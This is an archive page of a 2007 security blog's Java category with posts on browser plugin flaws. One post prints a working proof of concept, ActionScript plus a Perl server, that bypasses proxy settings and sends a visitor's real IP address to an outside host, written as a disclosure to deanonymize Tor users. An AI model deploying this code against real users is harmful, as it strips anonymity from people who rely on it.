Archive for the Java Category

Next Entries »
04 10 2007

Java, Quicktime and Other Good News

Posted by: Giorgio in Personal, Java, Mozilla, Security

Just not to be always destructive, a couple of flash(!) news about browser plugins issues we discussed in the past:

  1. The “Quicktime pwns default browsers” bug, after being worked around by Mozilla with the release of Firefox 2.0.0.7, has been fixed on the proper Apple side. Even if the advisory page refers to a SEP 21 date, the actual software update as been published right now.
  2. The Java evil popups I demonstrated two months ago have been addressed by Sun.

On a side note, this Saturday I’m gonna get married.
Cheers :)

Comments 19 Comments »

26 09 2007

Cross-Browser Proxy Unmasking

Posted by: Giorgio in IE, Anonymity, Flash, Java, Security, NoScript

It’s really time to sleep in my timezone, but I just couldn’t resist when I read latest RSnake’s post about Deanonymizing Tor and Detecting Proxies.

The basic concept, not terribly new by the way, is that browser proxy settings cannot be enforced on browser plugins, which happily ignore them in some circumstances, e.g. when establishing a direct TCP socket connection.
So if you’re using a proxy to hide your internet address (like Tor users do), embeddable objects like Java applets can betray you, revealing your real identity to advertisers spying on your habits or, worse, to the police of a repressive state.

This caveat has been preached even on the Tor download page itself, but nothing better than some scary demos to convert the non believers.

RSnake’s interesting proof of concept exploits JavaScript + LiveConnect , and it apparently works on Gecko-based browser with Java™ installed only. I didn’t manage to make it work on Opera, even though it does support LiveConnect.

So I decided to defer bedtime a bit and I put together my own quick deanonymizing proof of concept, which relies on the almost ubiquitous Macromedia® Flash® and works in any web browser, like Internet Explorer, supporting the Flash player (no need for JavaScript, either).
The XMLSocket ActionScript object is used to bypass browser’s proxy setting and connect to a tiny server written in Perl, listening on port 9999 and echoing client’s IP.

Here’s the ActionScript code:

  1. var socket = new XMLSocket();
  2. socket.onConnect = function(success) {
  3. socket.onXML = function(doc) {
  4. getURL("http://evil.hackademix.net/proxy_bypass?ip=" +
  5. doc.firstChild.firstChild.nodeValue);
  6. socket.close();
  7. };
  8. socket.send(new XML());
  9. };
  10. socket.connect("evil.hackademix.net", 9999);
Download this code: pbp.as

And here’s the Perl server:

  1. #!/usr/bin/perl -w
  2. use strict;
  3. use IO::Socket;
  4.  
  5. my $port = shift || 9999;
  6. my $sock = new IO::Socket::INET(
  7. LocalPort => $port,
  8. Proto => ‘tcp’,
  9. Listen => SOMAXCONN,
  10. Reuse => 1);
  11. $sock or die "socket: $!";
  12. my($new_sock, $c_addr, $buf);
  13. while (($new_sock, $c_addr) = $sock->accept())
  14. {
  15. my ($client_port, $client_ip) = sockaddr_in($c_addr);
  16. print $new_sock "<ip>" . inet_ntoa($client_ip) . "</ip>\000";
  17. $new_sock->close();
  18. }
Download this code: pbp.pl

Today’s lesson is: if you want to stay anonymous, you’d better turn off Java, Flash and any other plugin!

Update OCT-27

I’ve just learned that some months ago a guy called yawnmoth demonstrated an Unmasking Java Applet. Just like my Flash-based one, this works also in browsers, like IE, not supporting LiveConnect.
The lesson above obviously applies, even stronger.

Demos

Comments 17 Comments »

20 09 2007

Don’t Open That Doc!

Posted by: Giorgio in Flash, Java, Security, NoScript

Recent explosions of Petko D. Petkov (pdp)’s pwning lust should teach us a lesson: documents should be documents, not programs!

We’ve seen MP3 tunes pwning Firefox (and NoScript promptly counter-pwning), Windows playlists pwning browser security, and finally PDF documents pwning Windows PCs.
This latest “disclosure” sounds like a strange case of pwnatio precox, since Petko didn’t bother to reveal any detail about the flaw. All he said is

Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one.

I’ve got no problem with believing his words, since the stuff we keep calling “documents” became containers for all kinds of executable code long time ago, either intentionally (script embedding) or by accident (buffer overflows, often due to an overly complex format driven by creeping featurism).

I (like many people, I guess) do have problems with his suggested work-around:

My advise for you is not to open any PDF files (locally or remotely).

This is something no business can afford, plain and simple.
The real fix would be vendors stopping with these crazy mixes of data and code, but it’s something they seem not even considering.
So, how can we mitigate risks of this kind, which surely won’t go away even when Adobe will fix this specific PDF issue?

OK, I’m obviously biased here, but did you ever notice the NoScript Options/Advanced/Plugins panel?
NoScript content blocking options
It provides quite a flexible way to block Java, Flash, Silverlight and all the other plugins such as Acrobat Viewer, Windows Media Player and QuickTime, just to name the ones featured in pdp’s researches.
If you check all the Forbid... checkboxes but the last (IFRAMES), all types of plugin-handled, potentially dangerous content will be blocked by default if coming from unknown (and therefore untrusted) sites.
You’ll get a nice placeholder with the NoScript logo instead: you just click it, and you activate the content on the fly if you deem it’s trustworthy.
If you’re a paranoid like me, you may want to trade some usability for maximum security and check also the Apply these restrictions to trusted sites too option, which will mandate on-demand activation everywhere.

I heard someone saying security × usability = K.
If it’s true (and I hope some day it won’t necessarily be), NoScript tries hard to pump that K as much high as it can be.

Comments 6 Comments »

25 08 2007

Hey Dude, Where’s Your Code?

Posted by: Giorgio in SQL, Java, NoScript

Caravaggio, San GerolamoBoth the Java Evil Popups and the more recent SQL Injection Toy posts have been followed by kind requests to see the code.

Furthermore, I routinely receive inquiries about the source code of my most known Firefox extensions (NoScript and FlashGot), sometimes from people graciously accusing me of infringing the GPL which covers both.

I believe the time has come to make them all happy, but…

Disclaimer

True hackers won’t read further, because the info above is more than enough to obtain all the mentioned source code in a few seconds ;)
(more…)

Comments 2 Comments »

07 08 2007

Pure Java™, Pure Evil™ Popups

Posted by: Giorgio in Java, Mozilla, Security, NoScript

Imagine you’re a web advertiser.
Imagine you can open a popup window from a web page defeating any popup blocker.
Imagine this popup can invade the whole desktop, full screen.
Imagine this popup has no title bar, no menus, no toolbar, no location bar, no border and no buttons. No mean to close it.
Imagine user can’t move or minimize this popup. It will go away only when the browser is killed or your show is done…

Now imagine you’re a phisher.
Imagine you can use this almighty popup to draw anything you want. A fake browser or — why not? — a whole fake desktop to collect user’s data.

Impossible wet dreams of clueless evildoers?
No, it’s just 100% Pure Java™ Reality.

(more…)

Comments 113 Comments »

Next Entries »

Bad Behavior has blocked 2886 access attempts in the last 7 days.